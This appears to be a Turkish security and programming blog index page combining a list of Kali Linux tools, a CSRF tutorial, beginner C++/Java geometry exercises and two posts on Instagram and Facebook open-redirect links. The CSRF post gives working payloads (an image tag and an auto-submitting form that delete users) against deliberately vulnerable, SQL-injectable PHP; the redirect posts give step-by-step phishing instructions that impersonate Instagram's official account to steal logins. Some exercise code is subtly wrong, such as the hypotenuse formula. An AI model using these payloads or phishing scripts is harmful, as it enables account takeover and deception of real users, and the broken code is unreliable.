Kali Linux - Reporting Tools tüm kategorileri

Haziran 16, 2019

Kali Linux Tool Listesinde bulunan Reporting Toolsdaki şeylerin kısa olduğunu düşünerek hepsini bir konu altına topladım.İyi Okumalar..

CaseFile nedir ?

Maltego ile ilgili olan bir araç.Maltegoda verileri bağlama,analiz etme ve ekleme gibi özellikleri kolaylaştırıyor.

Depo için;
Detaylı bilgi için 


Cherrytree nedir ?

KeepNote,FreeMind benzeri not alma programı.
Yazı,Resim,tablo ve kod ekleyebilirsiniz.
tek bir xml veya sqlite dosyasında veri depolayan, hiyerarşik bir not alma uygulaması.

Depo için;
Detaylı bilgi için 

CutyCapt nedir ?
Websitelerinin Ekran Görüntüsünü almamıza yarar.

Depo için;
Detaylı bilgi için 


Dos2Unix nedir ?
LF,CRLF,CR formatlarında satır sonlarını dönüştürmek için 4 program kullanır
dos2unix = dos formatını unix formatına dönüştürür
unix2dos = unix formatını dos formatına dönüştürür.
mac2unix = mac formatını unix formatına dönüştürür.
unix2mac = unix formatını mac formatına dönüştürür.

Depo için;
Detaylı bilgi için 
dos2unix

Dradis nedir ?
Etkin bilgi paylaşımını sağlamak için açık kaynaklı bir çerçevedir.Genellikle güvenlik değerlendirmelerinde kullanılır.
Depo için;
Github/Dradis
Detaylı bilgi için 



MagicTree nedir ?
Veri konsolidasyonu, sorgulama, harici komut yürütme,Rapor oluşturma gibi birçok işlemi yapabileceğiniz tool.
Depo için;
Detaylı bilgi için 



Metagoofil nedir ?
EHedefe ait meta verilerini ve genel belgeleri çıkarmak için kullanılan bilgi toplama aracı.
Depo için;
Detaylı bilgi için 


Nipper-ng nedir ?
Router,Cihaz Güvenliği ve Güvenlik duvarları gibi birçok farklı cihazın güvenlik yapılandırmaları hakkında bilgi toplama
Depo için;
Detaylı bilgi için 

Pipal nedir ?
İstatistikleri analiz etmeye yarayan bir tool(Şifre Kırma Olasılığı gibi)
Depo için;
Github/Pipal
Detaylı bilgi için 


RDPY nedir ?
Uzak mataüstü protokolünün saf bir Python uygulamasıdır.SSL üzerinden RDP(Remote Desktop Connection)ve NLA(Network Level Authentication) kimlik doğrulamasını destekler.
Depo için;
Github/RDPY

Daha fazla...

Kali Linux Tool List ve Kullanımları

Haziran 16, 2019

Merhaba Arkadaşlar Aşağıdaki Listede Kali Linuxdaki Toolların isimlerini bulabilirsiniz.Hedefimiz tüm toolların kullanımını göstermeceğiz.Toolun Kullanımını Öğrenmek için toolun üstüne tıklayın.

YDmVNo.png


Information Gathering

ace-voip
Amap
APT2
arp-scan
Automater
bing-ip2hosts
braa
CaseFile
CDPSnarf
cisco-torch
copy-router-config
dnmap
DNSRecon
dnstracer
DotDotPwn
enum4linux
enumIAX
EyeWitness
Faraday
Firewalk
fragroute
fragrouter
Ghost Phisher
GoLismero
goofile
hping3
ident-user-enum
InSpy
InTrace
iSMTP
lbd
Maltego Teeth
masscan
Metagoofil
Miranda
nbtscan-unixwiz
Nikto
Nmap
ntop
OSRFramework
p0f
Parsero
Recon-ng
SET
SMBMap
smtp-user-enum
snmp-check
SPARTA
sslcaudit
SSLsplit
sslstrip
SSLyze
Sublist3r
THC-IPV6
TLSSLed
twofi
Unicornscan
URLCrazy
Wireshark
WOL-E
Xplico

YDmVNo.png

Vulnerability Analysis

BBQSQL
BED
cisco-auditing-tool
cisco-global-exploiter
cisco-ocs
cisco-torch
copy-router-config
Doona
DotDotPwn
HexorBase
jSQL Injection
Lynis
ohrwurm
openvas
Oscanner
Powerfuzzer
sfuzz
SidGuesser
SIPArmyKnife
sqlmap
Sqlninja
sqlsus
THC-IPV6
tnscmd10g
unix-privesc-check
Yersinia

YDmVNo.png

Exploitation Tools

Armitage
Backdoor Factory
BeEF
cisco-auditing-tool
cisco-global-exploiter
cisco-ocs
cisco-torch
Commix
crackle
exploitdb
jboss-autopwn
Linux Exploit Suggester
Maltego Teeth
MSFPC
RouterSploit
SET
ShellNoob
sqlmap
THC-IPV6
Yersinia

YDmVNo.png

Wireless Attacks

Airbase-ng
Aircrack-ng
Airdecap-ng and Airdecloak-ng
Aireplay-ng
airgraph-ng
Airmon-ng
Airodump-ng
airodump-ng-oui-update
Airolib-ng
Airserv-ng
Airtun-ng
Asleap
Besside-ng
Bluelog
BlueMaho
Bluepot
BlueRanger
Bluesnarfer
Bully
coWPAtty
crackle
eapmd5pass
Easside-ng
Fern Wifi Cracker
FreeRADIUS-WPE
Ghost Phisher
GISKismet
Gqrx
gr-scan
hostapd-wpe
ivstools
kalibrate-rtl
KillerBee
Kismet
makeivs-ng
mdk3
mfcuk
mfoc
mfterm
Multimon-NG
Packetforge-ng
PixieWPS
Pyrit
Reaver
redfang
RTLSDR Scanner
Spooftooph
Tkiptun-ng
Wesside-ng
Wifi Honey
wifiphisher
Wifitap
Wifite
wpaclean

YDmVNo.png

Forensics Tools

Binwalk
bulk-extractor
Capstone
chntpw
Cuckoo
dc3dd
ddrescue
DFF
diStorm3
Dumpzilla
extundelete
Foremost
Galleta
Guymager
iPhone Backup Analyzer
p0f
pdf-parser
pdfid
pdgmail
peepdf
RegRipper
Volatility
Xplico

YDmVNo.png

Web Applications

apache-users
Arachni
BBQSQL
BlindElephant
Burp Suite
CutyCapt
DAVTest
deblaze
DIRB
DirBuster
fimap
FunkLoad
Gobuster
Grabber
hURL
jboss-autopwn
jSQL Injection
Maltego Teeth
Nikto
PadBuster
Paros
Parsero
plecost
Powerfuzzer
ProxyStrike
Recon-ng
sqlmap
Sqlninja
sqlsus
ua-tester
Uniscan
w3af
WebScarab
Webshag
WebSlayer
WebSploit
Wfuzz
WPScan
XSSer
zaproxy

YDmVNo.png

Stress Testing

DHCPig
FunkLoad
iaxflood
Inundator
inviteflood
ipv6-toolkit
mdk3
Reaver
rtpflood
SlowHTTPTest
t50
Termineter
THC-IPV6
THC-SSL-DOS

YDmVNo.png

Sniffing & Spoofing

bettercap
Burp Suite
DNSChef
fiked
hamster-sidejack
HexInject
iaxflood
inviteflood
iSMTP
isr-evilgrade
mitmproxy
ohrwurm
protos-sip
rebind
responder
rtpbreak
rtpinsertsound
rtpmixsound
sctpscan
SIPArmyKnife
SIPp
SIPVicious
SniffJoke
SSLsplit
sslstrip
THC-IPV6
VoIPHopper
WebScarab
Wifi Honey
Wireshark
xspy
Yersinia
zaproxy

YDmVNo.png

Password Attacks

BruteSpray
Burp Suite
CeWL
chntpw
cisco-auditing-tool
CmosPwd
creddump
crowbar
findmyhash
gpp-decrypt
hash-identifier
Hashcat
HexorBase
THC-Hydra
Johnny
keimpx
Maltego Teeth
Maskprocessor
multiforcer
Ncrack
oclgausscrack
ophcrack
PACK
patator
phrasendrescher
polenum
RainbowCrack
rcracki-mt
RSMangler
SecLists
SQLdict
Statsprocessor
THC-pptp-bruter
TrueCrack
WebScarab
wordlists
zaproxy

YDmVNo.png

Maintaining Access

CryptCat
Cymothoa
dbd
dns2tcp
HTTPTunnel
Intersect
Nishang
polenum
PowerSploit
pwnat
RidEnum
sbd
shellter
U3-Pwn
Webshells
Weevely
Winexe

YDmVNo.png

Hardware Hacking

android-sdk
apktool
Arduino
dex2jar
Sakis3G
smali

YDmVNo.png

Reverse Engineering

apktool
dex2jar
diStorm3
edb-debugger
jad
javasnoop
JD-GUI
OllyDbg
smali
Valgrind
YARA

YDmVNo.png

Reporting Tools

Daha fazla...

CSRF Nedir ?

Haziran 15, 2019



Merhaba arkadaşlar bu Makalemde sizlere CSRF(Cross Site Request Forgery)
yani türkçe karşıtı ile "Siteler Arası İstek Sahtekarlığı"ndan bahsedeceğim

YDmVNo.png

CSRF Nedir ?


CSRF 3 Farklı isim (CSRF/XSRF/Session Riding) ile tanılabilir.Güven sömürüsüne dayanan bir açık türüdür.Bir web uygulamasına yapılacak olan saldırılar çeşitli yöntemlerle engellenmiş olabilir.Ancak bu engellemeler genelde tanımlı ve güvenilen kullanıcılardan ziyade,dışarıdan gelebilecek saldırılara karşı yapılır.XSRF saldırıları da web uygulamaları tarafından daha önce tanımlanan,bir session(Oturum) oluşturulan yani güvenilen bir kullanıcı üzerinden yapılır.Birnevi xss açığı gibi.


YDmVNo.png

XSS'den farkı ne ?

Cross Site Scripting (XSS)

 saldırılarında amaç tanımlama bilgileri olsa da hedef web uygulamasıdır.İlgili uygulamaya çeşitli kodlar gömülür ve Xss açıkları oluşturulur ve bu açıklar kullanılarak kullanıcı cookieleri çalınır Cross Site Request Forgery (CSRF/XSRF/Session Riding) saldırılarında ise bu saldırılardan doğrudan web uygulama değil kullanıcı hedeflenir.Uygulamalara,daha önce doğrulanan kullanıcılar üzerinde komutlar gödererek saldırı yapılır.

YDmVNo.png

Saldırı Yöntemleri

Get Metodu

Senaryomuza göre kullanıcıları silme sayfasi "kullaniciSil.php" olsun.Bu sayfa;GET metodu ile silinecek kullanıcının kullanıcı adını alsın ve veritabanından silsin.
Öncelik ile sistem için yazılımcının yazdığı kodu inceleyelim.
"baglan.php" dosyası ile veritabanına bağlanma işlemini gerçekleştirmiş.

baglan.php içeriği;

1
2
3
4
5
<?php
 session_start();
 mysql_connect('localhost','root','');
 mysql_select_db('csrf');
?>

kullaniciSil.php dosyası ile de kullaınıcıları listeliyor;
silmek istediği kullanıcıyı seçip silme işlemini gerçekleştiriyor.

kullaniciSil.php içeriği;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
<?php 
 require "baglan.php";
 if(isset($_GET["sil"])){
  $silinecekKullanici = $_GET["sil"];
  $girisYapmisKullanici = $_SESSION["login"];
  if($girisYapmisKullanici == "admin"){
   mysql_query("DELETE FROM users WHERE username='$silinecekKullanici'");
   echo " $silinecekKullanici adli kullanici silindi.!";
  }
 }
 echo "Silinecek Kullaniciyi Secin : ".PHP_EOL;
 echo "<form action='' method='get'>";
 echo "<select name='sil'>;
 $kullanicilar = mysql_query("SELECT * FROM users");
 while($kullanici = mysql_fetch_assoc($kullanicilar)){
  echo "<option>".$kullanici["username];
 }
 echo "</select>";
 echo "<input type='submit' value='Kullaniciyisil'>;
 echo "</form>";
?>

Yukarıdaki koda göre kullaniciSil.php dosyasına GET metodu ile sil parametresinden bir değer gelirse,gelen değeri veri tabanından silecek.
Silme işlemini yapmadan önce ufak bir kontrol gerçekleştiriyor.Bu kontrolde SESSION üzerinden giriş yapılan kullanıcının admin olup olmadığına bakıyor.Eğer admin ise silme işlemini gerçekleştiriyor.

Veritabanımızdaki kayıtlar örnek olarak
admin:adminpass
kurban:1235123
xkullanıcı:324231
saldirgan:hacker1234

olduğunu varsayalım.ve xkullanıcı hesabını kullaniciSil.php'ye girerek silelim.Url ile gönderim yapmış olacak

Yukarıdaki işlemleri admin yerine saldirgan yapmış olssa idi if koşusundan dolayı silme sorgusunun çalıştığı kod bloğu çalışmayacaktı.
Url ile gönderim yapmış olacak demiştim bu urlyi (http://xdomain.com/csrf/kullaniciSil.php?sil=xkullanıcı)
Saldırgan  admin'e bu request göndermesini sağlar isek amacına ulaşmış olacağız.Peki nasıl olacak.
Bakın Request dedim linke tıklaması önemli değil sadece request olması yeterli adminin.
bir bloğunuz veya websitenize yazılar yazın onun ilgisini çekecek şekilde ve bir 

<img src="urleniz"/>

gibi bir fake resim kodu yazacaksınız urleniz yerinede bendeki url gibi 
"http://xdomain.com/csrf/kullaniciSil.php?sil=xkullanıcı" 
yazın
Örnek ;

<img src="http://xdomain.com/csrf/kullaniciSil.php?sil=xkullanıcı"/>
eğer admin bloğunuzu veya sitenizi okumak için bile girse request aldığı için xkullanıcıyı siler.
YDmVNo.png

POST Metodu

Aynı kodları kullanıp sadece formu GET değil de POST olarak gönderdiğimizi varsayalım.Bu gibi durumlarda metot POST olduğundan,sayfaya giden parametreleri adres çubuğundan göndermeyeceğiz.


kullaniciSil.php post metod;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
<?php 
 require "baglan.php";
 if(isset($_POST["sil"])){
  $silinecekKullanici = $_POST["sil"];
  $girisYapmisKullanici = $_SESSION["login"];
  if($girisYapmisKullanici == "admin"){
   mysql_query("DELETE FROM users WHERE username='$silinecekKullanici'");
   echo " $silinecekKullanici adli kullanici silindi.!";
  }
 }
 echo "Silinecek Kullaniciyi Secin : ".PHP_EOL;
 echo "<form action='' method='get'>";
 echo "<select name='sil'>;
 $kullanicilar = mysql_query("SELECT * FROM users");
 while($kullanici = mysql_fetch_assoc($kullanicilar)){
  echo "<option>".$kullanici["username];
 }
 echo "</select>";
 echo "<input type='submit' value='Kullaniciyisil'>;
 echo "</form>";
?>


kod tamamıyle aynı sayılır requestten parametre okunan satırları post olarak değiştirdim.
Bu durumda form'dan veri seçilip gönderildiğinde veriler arkaplanda gizlice gönderildiğinden,Url üzerinden bir saldırı gerçekleştiremeyeceğiz.
Biz bu saldırıyı gerçekleştirirken;JavaScript'in form.submit() fonksiyonunu kullanacağız.Yani admin bizim hazırladığımız web sitesine veya sayfasına girecek.POST saldırısındada get saldırısı gibi yapacağız ama sayfa çalıştığında js tarafından oto olarak gönderilmesini sağlayacağız.

<form name="form" action="http://xdomain.com/csrf/kullaniciSil.php" method="post">
<input type="hidden" name="sil" value="kurban">
</form>

<script type="text/javascript">document.form.submit();</script>


YDmVNo.png

Korunma Yöntemleri

1.Kayıtlı Cookieler bilgisayarda uzun süre tutulmamalı.
2.Cookielerin Geçerlilik Süresini gözden geçirin.
3.Web sayfalardan çıkarken,açık olan oturum kapatılmalıdır.
4.HTTP Referer Başlığını Kontrol Edin.
5.Token Kullanın
6.Kimlik Doğrulama Seviyesini Arttırın.
7.Bilinenin aksine Get yerine Post kullanımı xsrf açığını engellemez.JavaScript kullanılarak bu önlem geçersiz kılınabilir.
8.Referer Kontrol


YDmVNo.png



Daha fazla...

Algoritma ve Programlama Mantığı -B8 //Taban ve Yüksekliği bilinen bir üçgenin alanını hesaplayan program

Haziran 07, 2019


Problem;
Klavyeden taban ve yüksekliği girilen bir üçgenin alanını hesaplayan ve ekrana yazdıran program.
Problemin Formülleri;
Alan=taban.h/2

Algoritma Adımları;
  1. BAŞLA
  2. taban,h Oku
  3. Alan =taban*h/2
  4. Alan Yaz
  5. DUR

Algoritma Akış Diyagramı;



C++ Kodları;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#include<iostream>
using namespace std;
int main()
{
 double taban,h;
 cout << "Üçgenin Taban uzunluğunu giriniz :";
 cin >> taban;
 cout << "Üçgenin yüksekliğini giriniz :";
 cin >> h;
 double alan = taban*h/2;
 cout << "Alan =" << alan; 
}


Java Kodları;
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
import java.util.Scanner
public class bolum8
{
 public static void main(String[]args)
 {
  Scanner scn = new Scanner(System.in);
  System.out.print("Üçgenin Taban uzunluğunu giriniz :");
  double taban = scn.nextDouble();
  System.out.print("Üçgenin yüksekliğini giriniz :");
  double h = scn.nextDouble();
  double alan = taban*h/2;
  System.out.println("Alan = "+alan);
 }
}

Daha fazla...

Algoritma ve Programlama Mantığı -B7 //Bir Üçgende Pisagor Teoremi ile Hipotenüs Hesaplayan program

Haziran 07, 2019


Problem;
Klavyeden iki dik kenar uzunşuğu girilen bir üçgenin hipotenüs uzunluğunu Pisagor teoremi ile hesaplayan program.

Pisagor Teoremi
C=Kİ(A^2+B^2)
Kİ=Kök İçinde
Algoritma Adımları;
  1. BAŞLA
  2. k1,k2 Oku
  3. Hipotenus = (k1^2 + k2^2)(1/2)
  4. Hipotenus yaz
  5. DUR

Algoritma Akış Diyagramı;



C++ Kodları;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#include<iostream>
using namespace std;
int main()
{
 double k1,k2;
 cout << "Üçgenin 1.Dik kenar uzunluğunu giriniz :";
 cin >> k1;
 cout << "Üçgenin 2.Dik kenar uzunluğunu giriniz :";
 cin >> k2;
 double hipotenus = sqrt(k1*k2+k2*k2);
 cout << "Hipotenus = " << hipotenus; 
}


Java Kodları;
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
import java.util.Scanner
public class bolum7
{
 public static void main(String[]args)
 {
  Scanner scn = new Scanner(System.in);
  
  System.out.print("Üçgenin 1.Dik kenar uzunluğunu giriniz :");
  double k1 = scn.nextDouble();
  System.out.print("Üçgenin 2.Dik kenar uzunluğunu giriniz :");
  double k2 = scn.nextDouble();
  double hipotenus = Math.sqrt(k1*k2+k2*k2);
  System.out.println("Hipotenus = "+hipotenus);
 }
}

Daha fazla...

Algoritma ve Programlama Mantığı -B6 //Km Cinsinden Bir Uzunluğu Mile Çeviren Program

Haziran 07, 2019


Problem;
Klavyeden birimi kilometre olarak girilen bir uzunluğu mil birimine çevirip,ekrana yazdıran program.

Algoritma Adımları;
  1. Başla
  2. "km" oku
  3. Mil = (0.62)*km
  4. Yaz Mil
  5. Dur

Algoritma Akış Diyagramı;





C++ Kodları;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
#include<iostream>
using namespace std;
int main()
{
 double km;
 cout << "Km Cinsinden uzunluğu girin =";
 cin >> km;
 double Mil = (0.621371192)*km;
 cout << "Mil = " << Mil;
}


Java Kodları;
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
import java.util.Scanner;
public class bolum6
{
  public static void main(String[]args)
  {
  Scanner scn = new Scanner(System.in);
  System.out.print("Km Cinsinden uzunluğu girin =");
  double km = scn.nextDouble();
  double Mil = (0.621371192)*km;
  System.out.println("Mil = "+Mil);
  }
}

Daha fazla...

Algoritma ve Programlama Mantığı -B5 //Kürenin Alanını ve Hacmini Hesaplayan Program

Haziran 07, 2019


Problem;
Klavyeden yarıçap uzunluğu girilen kürenin alanını hesaplayıp ekrana yazdıran program
Problemin Formülleri;
Alan=4.Pi.r^2
Hacim = 4/3.Pi.r^3


Algoritma Adımları;
  1. BAŞLA
  2. Tanımla,Pi=3.14
  3. "r"yi oku
  4. Alan=4*Pi*(r^2)
  5. Hacim=(4/3)*Pi*(r^3)
  6. Alan,Hacim yaz
  7. DUR

Algoritma Akış Diyagramı;




C++ Kodları;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#include<iostream>
using namespace std;
#define Pi 3.14
int main()
 {
 double r;
 cout << "Kürenin yari Capini giriniz =";
 cin >> r;
 double alan = 4 * *Pi* r*r;
 double hacim = (4/3) * Pi * r* r* r;
 cout << "Alan = " << alan << endl << "Hacim = " << hacim; 
}

Java Kodları;
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
import java.util.Scanner;
public class bolum5
{
 public static void main(String[]args)
 {
  final double Pi = 3.14;
  Scanner scn = new Scanner(System.in);
  System.out.print("Kürenin yari capini giriniz =");
  double r = scn.nextDouble();
  double alan = 4 * Pi* r*r;
  double hacim = (4/3) * Pi * r* r* r;
  System.out.println("Alan = "+alan);
  System.out.println("Hacim = "+hacim);
 }
}

Daha fazla...

İsaac Security - Admin Panel Finder v1.0

Mayıs 25, 2019

İsaac Security  Hacking Araçları-Admin Panel Finder v1.0

Admin Paneli Bulmanızı çok kolaylaştıracak bir program Tüm Kafeindostu okuyucularına hediyem.




Kullanım Videosu;


Virüs Total ve İndirme Linkleri;




Daha fazla...

İnstagram URL Yönlendirme Exploit ile İnstagram Phising

Mayıs 22, 2019


Merhaba Arkadaşlar bugun rastgele olarak bulduğum küçük bir açığı sizlere paylaşacağım.


Kısa Anlatım;

(Link Sürekli Kodla Kapandığı için görünmüyor o yüzden pasted.co ya yazdım)

Mavi renkte yazılan yere x.com gibisinden sitenizi yazın (Örnek; www.domain.com / domain.com)
Kırmızı renkli olan yere https veya http ne ise onu yazın.

https://l.instagram.com/?u=https%3A%2F%2Fwww.kafeindostu.com%2F&e=ATMc3bmMtccDVFkHdbssFHJ1SdBXu1UFnJRl-xWWH2VqPpBOqcWBC5lZgam9u34qF5Vf96rdc3bkv847


Phising örnek sahnesi;
İnstagram ile ilgili kullanıcı adı açın ve bir grup açın gruba instagramın gerçek hesabı,kurbanın hesabını yazın ve phising ile "Merhaba X Hesabınızın doğrulama alabilecek seviyede olduğunu düşündük. doğrulamak için bu linkten başvuru yapabilirsiniz ; Linkiniz." gibi bir mesaj atın.Ve Gruptan çıkın.Bunu yaptığınızda instagramın orj hesabının ona mesaj attığını sanacak.


Exploit;
###########################################################
██╗███████╗ █████╗  █████╗  ██████╗
██║██╔════╝██╔══██╗██╔══██╗██╔════╝
██║███████╗███████║███████║██║     
██║╚════██║██╔══██║██╔══██║██║     
██║███████║██║  ██║██║  ██║╚██████╗
╚═╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝
╔═╗┌─┐┌─┐┬ ┬┬─┐┬┌┬┐┬ ┬ 
╚═╗├┤ │  │ │├┬┘│ │ └┬┘ 
╚═╝└─┘└─┘└─┘┴└─┴ ┴  ┴
###########################################################
# Exploit Title: İnstagram URL open Redirection
# Date: 22.05.2019
# Exploit Author: İsaacSecurity
# Vendor Homepage: http://www.facebook.com/ 
# Tested on: Chrome
------------------------------------------------
https://l.instagram.com/?u= 
u= http or https

https://l.instagram.com/?u=https%3A%2F%2F
target website www.x.com

https://l.instagram.com/?u=https%3A%2F%2Fx.com%2F&e=ATMc3bmMtccDVFkHdbssFHJ1SdBXu1UFnJRl-xWWH2VqPpBOqcWBC5lZgam9u34qF5Vf96rdc3bkv847

------------------------------------------------

Daha fazla...

Facebook URL Yönlendirme Exploit ile İnstagram Phising

Mayıs 22, 2019


Facebook Url yönlendirmeleri için kullanılan küçük bir açık uzun zamandır işlemde ve Phising için güzel bir işlem olabilir.


Kısa Anlatım;


X Yazan yere yönlendirilecek siteyi girin.



0day'dan alınmıştır yararlı gördüğüm için paylaşmak istedim.




Phising örnek sahnesi;

İnstagram ile ilgili kullanıcı adı açın ve bir grup açın gruba instagramın gerçek hesabı,kurbanın hesabını yazın ve phising ile "Merhaba X Hesabınızın doğrulama alabilecek seviyede olduğunu düşündük. doğrulamak için bu linkten başvuru yapabilirsiniz. https://www.facebook.com/l.php?u=www.phisingsitesi.com" gibi bir mesaj atın.Ve Gruptan çıkın.Bunu yaptığınızda instagramın orj hesabının ona mesaj attığını sanacak.



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0                            We are Inj3ct0r Team                      1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Facebook URL open Redirection
# Date: 05/11/2013 - 01/01/1435
# Exploit Author: 1337Day Team
# Tested on: Mozilla firefox
------------------------------------------------
First let's talk about redirection in facebook when you send  a link to someone in facebook chat or post
facebook create a security token for every single link , so your link must be like that so you can rediect
using this exploit you wont need security token and you can trick victimes easily
------------------------------------------------
# You go this page
and you copy the link of "download sdk"
# you keep only this
# then you add to it
#so it became like that :
#  0day.today [2019-05-21]  #

Daha fazla...